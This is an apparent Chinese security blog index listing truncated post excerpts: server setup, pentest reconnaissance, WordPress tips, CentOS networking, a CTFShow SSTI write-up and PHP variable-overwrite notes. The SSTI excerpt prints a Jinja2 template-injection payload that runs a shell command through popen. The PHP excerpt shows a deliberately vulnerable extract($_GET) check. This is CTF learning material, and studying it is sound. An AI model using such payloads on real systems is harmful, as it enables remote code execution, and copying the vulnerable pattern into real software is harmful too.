thumbnail
【原创 精华 超详细】虚拟主机转到服务器搭建网站全过程
[huayang] 一些别的设置参照以下文章 https://hellohy.top/huayang/54.html https://hellohy.top/huayang/2084.html https://hellohy.top/huayang/4758.html 因学习需要买了台服务器 因为这个服务器有网站所以 不外借不转让 服务器配置 我买的是腾讯云:https://cloud.tence…
【原创 精华】渗透测试-信息收集
一切需要用到的软件均已备份到百度云和阿里云 没有链接的文件请在本地渗透工具文件夹或是kali里查看 能用fofa的尽量用 包括查ip,端口扫描,子域名,蜜罐 子域名收集 工具 子域名挖掘机(本地文件有) 通过爆破的模式 https://phpinfo.me/domain/ 搜索引擎语法 谷歌百度通用 site:*baidu.com 证书查询 https://crt.sh 搜索百度四级域名 %.%.…
thumbnail
【原创 精华】网站建设的一些问题及解决方法
[huayang] 一些wordpress主题的文章及解决方法 有些重复的内容跳过即可 【原创】关于wordpress以及H-Siren主题的一些改动和解决办法 【原创】关于Argon 主题添加的一部分扩展详情 一定要禁用Google 字体 一定要禁用Google 字体 一定要禁用Google 字体 否则卡得一批 网页加载速度的问题可以看这篇文章https://segmentfault.com/a…
【原创】CTFShow—SSTI
[huayang] web361 ?name={{().__class__.__bases__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 {{x.__init__.__globals__['__builtins__'].eval('__im…
【原创 精华】详解变量覆盖(待更)
[huayang] 变量覆盖 extract() 从数组中将变量导入到当前的符号表 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim($flag); if($shiyan==$content) { echo'ctf{xxx}'; } else { echo'Oh.no'; } } ?> $$ 可变…
thumbnail
【学习笔记】 centcentOS linux
[huayang] 配置静态地址(2021.3.3) nmcli NetworkManager //守护进程 nmcli是命令行管理NetworkManager的工具 /etc/sysconfig/network-scripts/ //配置文件地址 网络配置是基于会话connection connection(逻辑配置) add //添加一个会话 delete //删掉一个会话 edit //编辑…